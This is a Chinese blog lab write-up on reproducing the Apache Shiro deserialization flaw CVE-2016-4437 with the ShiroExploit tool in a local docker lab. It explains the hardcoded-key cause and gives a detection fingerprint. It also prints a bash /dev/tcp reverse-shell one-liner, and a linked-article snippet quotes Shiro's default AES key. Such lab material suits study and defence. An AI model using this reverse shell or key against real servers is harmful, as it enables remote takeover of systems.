shiro 反序列化 _CVE-2016-4437

最新推荐文章于 2024-08-25 18:08:25 发布
最新推荐文章于 2024-08-25 18:08:25 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 渗透测试实验 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/122192099
版权

1.环境搭建

实验靶机:CentOS7(192.168.2.102)

攻击机:Kali-Linux(192.168.2.101)

在CentOS7开启docker容器:

浏览器登录192.168.2.102:8080

2.漏洞利用

影响版本:Apache Shiro <= 1.2.4

下载shiro反序列化工具:

Release ShiroExploit v2.3 · feihong-cs/ShiroExploit-Deprecated (github.com)

填入靶机地址:

对kali的9999端口进行监听:

点击执行:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JIYV23xh-1640671674023)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211225131031.png)]

可以看到shell反弹成功,获取root权限

利用的的反弹shell:

bash -i >& /dev/tcp/IP/PORT 0>&1

放到网站上进行加密java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

3.漏洞分析

漏洞原因:

Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

漏洞特征:

shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段

漏洞复现】shiro 反序列化CVE-2016-4437
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 704
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。...
CVE-2016-4437 Apache Shiro反序列化命令执行漏洞复现
afei001
04-05 413
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulhub搭建搭建漏洞环境 5.2 如何检测是否使用Shiro框架 5.3 insightglacier/Shiro_exploit复现 5.4 sv3nbeast/ShiroScan复现 5.5 feihong-cs/ShiroExploit复现 6.漏洞修复 1.漏洞概述 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Shiro框架直观...
shiroshiro反序列化漏洞综合利用工具v2.2(下载、安装、使用)
yy1715713348的博客
03-29 2824
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。客常用的开发软件都在这里了,给大家节省了很多时间。
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
Shiro-550反序列化漏洞检测工具下载
最新发布
2401_86855609的博客
08-25 313
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。pache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。
Shiro反序列化工具——ShiroAttack2
qq_44029310的博客
09-24 9053
shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题。作者为SummerSec。
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
shiro反序列化漏洞环境搭建
帅醉了的博客
05-09 2689
kali下shiro反序列化漏洞环境搭建 git clone https://github.com/apache/shiro.git git checkout shiro-root-1.2.4 #进入shiro cd samples/web 安装mvn工具 sudo apt-get install openjdk-8-jdk sudo mkdir -p /usr/local/apache-maven wget http://ftp.wayne.edu/apache/maven/maven-3/3.3.9/
Apache Shiro反序列化远程代码执行 复现 环境搭建
u010508029的博客
05-14 1029
docker pull medicean/vulapps:s_shiro_1 docker run -d -p 5001:8080 medicean/vulapps:s_shiro_1 yum install python3-devel pip3 install pycryptodome shiro.py # pip install pycrypto import sys import base64 import uuid from random import Random impo..
shiro反序列化[cve_2016_4437]
紫洋的博客
05-09 863
Apache Shiro 1.2.4 及以前版本中,加密的用户信息序列化后存储在名为 remember-me 的 Cookie 中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1673
0x01简介 这个漏洞属于java反序列化漏洞的一种,shiro是java的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
shiro反序列化漏洞详解与复现(shiro-550/CVE-2016-4437
ccccai22的博客
08-28 269
shiro反序列化漏洞shiro-550/CVE-2016-4437
shiro反序列化复现.zip
08-03
shiro反序列化复现工具包;shiro反序列化复现工具包;
shiro反序列化搭建、利用、复现、漏洞原理
芜湖~米汤来喽~
01-07 2039
Shiro框架下框架供了记住密码的功能(RememberMe)用户登陆成功后会生成一个经过加密的Cookie其Cookie的RememberMe的Value的值是经过序列化、AES加密和base64编码后得到的结果。由于使用了AES加密,在Shiro1.2.4版本之前AES加密默认密钥的Base64编码值为kPH+bIxk5D2deZiIxcaaaA==,于是就可得到Payload的构造流程:恶意命令–>序列化–>AES加密–>base64编码–>发送Cookie–>回显数据–>数据解码。
shiro反序列化
cc777777777的博客
06-10 709
shiro发序列化
Apache Shiro 反序列化漏洞利用工具使用
Big World
02-15 9470
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞工具下载地址:Shiro_Exploit 该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget...
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7721
shiro -550 反序列化(一)
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2887
CVE-2016-4437 Shiro反序列化漏洞复现
详细shiro漏洞复现及利用方法(CVE-2016-4437
热门推荐
dreamthe的博客
04-26 3万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
JAVA反序列化学习--shiro反序列化分析
qq_53003652的博客
09-27 284
最近参加了某攻防活动,也是遇到了很多的shiro反序列化,上手后也是直接拿起工具就用,原理也仅仅是了解,菜鸟对于shiro也是有太多不了解的,接下来就详细分析一下shiro反序列化产生的原理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值